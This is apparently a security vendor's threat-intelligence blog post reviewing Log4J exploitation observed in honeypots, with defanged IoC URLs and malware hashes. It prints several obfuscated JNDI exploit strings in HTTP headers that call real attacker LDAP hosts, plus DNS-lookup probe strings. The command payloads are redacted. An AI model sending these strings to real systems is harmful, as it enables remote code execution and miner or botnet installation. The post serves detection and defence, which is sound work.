Log4j Attacks - A Week in Review

Key Takeaways

Log4J Vulnerabilities (CVE-2021-44228, CVE-2021-45046) are being exploited by opportunistic attackers.
Evasion techniques are being employed to subvert detection.

Overview

A week into the Log4J vulnerability that’s impacting just about every industry, there’s been patching, re-patching, and more adoption of this vulnerability by attackers. Lacework Labs has continued to closely monitor the situation and continues to see Mirai, Kinsing and Cryptocurrency miners be distributed as originally reported in this blog a week ago. While the first patch introduced potential for a DoS attack, Lacework Labs has not seen this employed to affect CVE-2021-45046. Over time, more of the initial JNDI strings have become obfuscated to attempt to subvert detection. An example of payloads Lacework Labs saw being used last weekend and then payloads being used today can be seen in the image above. This blog post will highlight some of the techniques Lacework Labs has identified.

Where to Put The Payload?

Given the ubiquitous usage of the Log4J library in enterprise and open source software this particular vulnerability has been difficult for organizations to identify every place where they might be vulnerable. For example, a web server not running any software that leverages Log4J may be hit with a payload that exploits CVE-2021-44228 and not be impacted. However, a log forwarder (ex: syslog) would pass on that particular server’s logs to a logging stack that may use Log4J thus causing the payload to be executed deeper within a network.

These delayed payload executions further intrigue attackers looking to move deeper into a network, but it also presents a question to the attacker of where to put the payload string. Lacework Labs has observed opportunistic attackers placing the JDNI exploitation string within numerous fields of an HTTP request including the User-Agent, refer header, etc. Interestingly enough in certain circumstances the same payload was used but with different string evasion techniques. Two examples of this can be seen below.

GET /
x:%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FBasic%2FCommand%2FBase64%2F<REDACTED_PAYLOAD>
referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
x-forwarded-for ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
user-agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD}

Figure 1 – Payload Obfuscation

GET /
x:%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FBasic%2FCommand%2FBase64%2F<REDACTED_PAYLOAD>
referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
x-forwarded-for ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>}
user-agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD}

Figure 2 – Payload Obfuscation 2

Delayed execution further lowers the bar for opportunistic attackers looking to deploy Cryptocurrency miners. Effectively after sending RCE payload which downloads and executes a bash script to deploy a Cryptocurreny miner, they only need to keep the initial bash script hosted and may have it spread throughout an environment through log forwarding.

Observed Technique – String Manipulation

Typically, the format of the exploit string is as follows:

${jndi:ldap//<attackers_ip_address>:<attacker_port>/path/to/resource}

Figure 3 - Original PoC Exploit String

Lacework Labs has observed string concatenation to build various portions of the exploit string such as “ldap” as shown in the table below.

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://<REDACTED>

Figure 4 - Payload string Modification 1

While this technique was reported in our original blog, it has further been adopted to include the “JNDI” portion of the string. Lacework Labs has identified the JNDI payload portion of the Log4J proof-of-concept exploits being stored in the User-Agent portion of HTTP requests.

User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<REDACTED>

Figure 5 - Payload string Modification 2

User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://<REDACTED>

Figure 6 - Payload string Modification 3

These simple string manipulations highlight the need for verbose detections that are not simple static rules in order to be all encompassing of the variety of payloads attackers will continue to modify and adapt to the latest detection bypasses. Perhaps the most aggressive payload for evasion can be observed below where the JNDI, LDAP, and IP portion of the payload was obfuscated along with the Tomcat path being targeted.

User-Agent: ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}} \r\nAccept: */*\r\n
Bearer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n
Authentication: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n
X-Requested-With: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n
X-Requested-For: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n
X-Api-Version: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n
Referer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n'"

Figure 7 - Payload string Modification 4

Observed Technique – DNS Lookups

The ability to modify the JNDI exploit string to perform DNS lookups allows for individuals to test if a server is vulnerable to Log4J without executing an actual payload against the victim. Instead, a DNS request can be issued from the target machine to a particular DNS record. This can also be performed via “ldap” JNDI directive and our friends at Thinkist have a blog post on how to achieve this. Lacework Labs has identified this behavior for “scanning” for vulnerable and can be seen in the images below.

${jndi:ldap://x${hostName}.L4J.p5k9q4p8cdf6n8wv0fw73jqut.canarytokens.com/a

Figure 8 - Canarytokens in JNDI String

user-agent:${${::-j}ndi:dns://45.83.64.1/securityscan-w6dvor7c5l4b6ztz

Figure 9 - Payload string Modification for DNS

A further concerning usage of this technique was highlighted by security researcher Zander Work on how this particular technique could be used for sensitive environment variable/API theft. Lacework Labs has not seen that particular event within their honeypots, however the environment name manipulation technique was observed being adopted to then build “JNDI” strings.

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//

Figure 10 - Payload string Modification 4

Conclusion

Opportunistic attackers continue to leverage Log4J vulnerabilities for spreading a variety of bots (Kinsing, Mirai, Mushtik) and Cryptocurrency miners. The modification of the exploitation string demonstrates adversaries rapidly adapting to the research being published publicly. Having a verbose detection strategy against these payloads is critical to avoid a “whack-a-mole” situation with detecting specific strings.

Understanding where Log4J exists in your environment is no easy task, nor is mitigating the vulnerability. Given the dynamic nature of the situation, Lacework Labs recommends following official Log4J security advisory guidance as well as vendors security guidance for their software when making internal security decisions.

For more content like this flow us on Twitter and LinkedIn!

IoCs

Observed IPs Hosting Dropper Scripts/Binaries

hxxp://135.125.217.87/jndi[.]sh

hxxp://92.242.40.21/lh2[.]sh

hxxp://82.118.18.201/lh[.]sh

hxxp://80.71.158.44/lh[.]sh

hxxp://194.40.243.149/lh[.]sh

hxxp://62.210.130.250/lh[.]sh

hxxp://152.67.63.150[/]py

hxxp://155.94.154.170/aaa

hxxp://185.191.32.198

hxxp://14.215.128.148

Filename	SHA256
py	af997593d2df937f8295976d99a2779b9b8fab58cf2b572651d4144c3ae030ea
kinsing	6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
lh2.sh	2fbc3b9421bc770831a724d9e467c7dbc220dc41c0ca21d33a45893be4ff82d4
pty3	a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
pty11	63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
libsystem.so	c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
pty1	e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
1sh	b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
log	a290b6f956ecdb3d2d2019088f0b01a93a9f680c82a4680c0fb87eb5e3e64897
3sh	5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28
pty2	715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
stlalive.sh	d050b27779d9090dcd3ca5bdae6343cfa3aac1b5cd55c032cb13fab26cbb06b8
static.c	ef11c120fab2129fce6dddb8b007102ef98281e11864386ff09c179c58d1dfe0
stl.sh	caf8f47fde4f20e134af0ee93dff4d70086ec4912e85a5dc5c09fbd6ae66b96b
jndi.sh	56353abdfd74916b32b114e4f0e310a9d1b197a803bb8e37fd43c7134cd53b6b
lh.sh	acf011a715b535dc75e3ae56fbf9622b3a8952f6eaf34dbd0e33fbb5c8bb35be
pty4	c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
ldm	39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
pty5	19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
pty10	6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
lh.sh	3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26